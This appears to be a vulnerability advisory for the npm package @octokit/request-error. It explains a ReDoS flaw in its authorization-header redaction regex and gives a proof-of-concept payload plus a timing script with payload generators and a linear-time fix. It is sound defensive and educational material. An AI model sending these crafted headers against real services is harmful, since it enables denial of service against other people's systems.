@octokit/request-error is the npm package Octokit uses to represent errors from GitHub API requests. It provides a specialized error class, RequestError, that carries the request, the response status and the response data alongside the message, giving more structured error handling than a generic JavaScript Error.
Version 2.1.0 grows the unpacked size of the package from 17431 bytes in version 2.0.6 to 21914 bytes, which indicates additions or modifications to the code. Both versions declare the same dependencies ("once", "deprecation" and "@octokit/types") and the same development dependencies, so the core functionality and the build and test setup are unchanged, and both versions were published on the same day. Note that 2.1.0 is itself affected by the ReDoS advisory listed below, so moving to 2.1.0 is not sufficient: upgrade to a release that includes the fix for that advisory.
All vulnerabilities affecting version 2.1.0 of the package
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of index.ts (the "index" in the advisory title) in the @octokit/request-error repository.
The vulnerability is caused by an inefficient regular expression in the handling of the authorization header: when a RequestError is constructed, the request is copied and the credential in the header is redacted with a replace call:
authorization: options.request.headers.authorization.replace(
    / .*$/,           // a space, then everything up to the end of the string
    " [REDACTED]"
)
The regular expression / .*$/ is meant to match a space followed by everything up to the end of the header value. Two details of JavaScript regex semantics make it quadratic on hostile input: "." does not match a newline, and without the m flag "$" only matches at the very end of the string, not at the end of a line. An attacker can therefore send an authorization header consisting of a long run of spaces followed by a newline and "@", such as:
headers: {
    authorization: "" + " ".repeat(100000) + "\n@",
}
Each of the 100000 spaces is a possible starting point for the match. From a given space, ".*" greedily consumes all the remaining spaces, stops at the newline, and "$" fails because the string does not end there; the engine then gives the spaces back one at a time, failing "$" at each step, before moving on to try the next space. The total work grows with the square of the number of spaces, so a single 100 KB header pins a CPU core for a long time, slowing down or freezing the process that constructs the RequestError. This leads to a denial-of-service condition, impacting availability.
// Proof of concept against a vulnerable release: constructing the error runs
// the redaction above on the crafted authorization header, so this single
// call is enough to consume the CPU.
import { RequestError } from "@octokit/request-error";

const error = new RequestError("Oops", 500, {
    request: {
        method: "POST",
        url: "https://api.github.com/foo",
        body: {
            bar: "baz",
        },
        headers: {
            // 100000 spaces, then a newline and "@": every space is a match
            // candidate, none of them succeeds, and each one backtracks.
            authorization: "" + " ".repeat(100000) + "\n@",
        },
    },
    response: {
        status: 500,
        url: "https://api.github.com/foo",
        headers: {
            "x-github-request-id": "1:2:3:4",
        },
        data: {
            foo: "bar",
        },
    },
});
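To make the mechanism concrete, here is an added example in JavaScript (my own code, not code from the @octokit/request-error project): it puts the vulnerable pattern quoted above beside a regex-free redaction that costs one indexOf and one slice, generates the advisory's payload for a chosen number of spaces plus a second variant with a letter before every space, and times both redactions on growing inputs so the quadratic growth is visible. The names redactVulnerable, redactLinear, craftPayload, craftAlternatingPayload and measureMs are mine, and the sample headers are constructed.

```javascript
// Added example, not code from @octokit/request-error. Names are my own.

// The pattern used by the vulnerable releases. Two JavaScript regex rules
// drive the cost: "." never matches "\n", and without the "m" flag "$"
// matches only at the very end of the string.
const VULNERABLE_PATTERN = / .*$/;

function redactVulnerable(authorization) {
  return authorization.replace(VULNERABLE_PATTERN, " [REDACTED]");
}

// Regex-free replacement: keep the scheme (text before the first space) and
// drop everything after it. One indexOf and one slice, so the cost is linear
// in the header length whatever the content. On a header that contains "\n"
// it redacts more than the regex did (from the first space instead of a space
// on the final line), which is the safe direction for a credential.
function redactLinear(authorization) {
  const firstSpace = authorization.indexOf(" ");
  if (firstSpace === -1) return authorization; // no credential part to hide
  return authorization.slice(0, firstSpace) + " [REDACTED]";
}

// Constructed attacker input from the advisory: n spaces, then "\n@". Every
// space is a candidate start; ".*" eats the remaining spaces, stops at "\n",
// "$" fails, the engine gives the spaces back one at a time, then retries from
// the next space. Roughly n*n/2 steps in total.
function craftPayload(spaces) {
  return " ".repeat(spaces) + "\n@";
}

// Constructed variant with a non-space before every space. It defeats patches
// that only refuse to start a match on a space preceded by another space,
// because each space still starts a full scan to "\n" followed by backtracking.
function craftAlternatingPayload(pairs) {
  return "a ".repeat(pairs) + "\n@";
}

// Wall-clock milliseconds for one call; only used to show the growth rate.
function measureMs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Constructed, well-formed headers on which both redactions must agree.
const SAMPLE_HEADERS = [
  "Bearer ghp_exampleTokenValue", // placeholder, not a real token
  "Basic dXNlcjpwYXNz",
  "token abcdef",
  "nospace",
];

function redactionsAgree(headers) {
  return headers.every((h) => redactVulnerable(h) === redactLinear(h));
}

// Demo: doubling the input roughly quadruples the regex time while indexOf
// stays flat. The regex runs are kept far below the advisory's 100000 spaces
// so this finishes in seconds.
function demo() {
  for (const n of [1000, 2000, 4000, 8000]) {
    const spaces = measureMs(redactVulnerable, craftPayload(n)).toFixed(1);
    const pairs = measureMs(redactVulnerable, craftAlternatingPayload(n)).toFixed(1);
    const linear = measureMs(redactLinear, craftPayload(n)).toFixed(3);
    console.log(`n=${n}: regex/spaces ${spaces} ms, regex/"a " pairs ${pairs} ms, indexOf ${linear} ms`);
  }
  const big = measureMs(redactLinear, craftPayload(100000)).toFixed(3);
  console.log(`n=100000: indexOf ${big} ms (not attempted with the regex)`);
}

demo();
```

Run it with node. Doubling the number of spaces roughly quadruples the time of the regex version, while the indexOf version stays flat even at the advisory's 100000 spaces. The regex-free variant is one safe replacement, not necessarily the one the project shipped; whichever fix you adopt, test it with both payloads, since a patch that merely refuses to start a match on a space preceded by another space is still quadratic on the "a a a a\n@" form.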
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to an inefficient regular expression (/ .*$/) used to sanitize the authorization header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial of service (DoS).
Applications using @octokit/request-error that process authorization headers are at risk, especially those handling a large volume of authentication requests. The header has to be attacker-controlled and reach the RequestError constructor, which is the case for any service that forwards client-supplied tokens to GitHub and builds errors from the failed requests.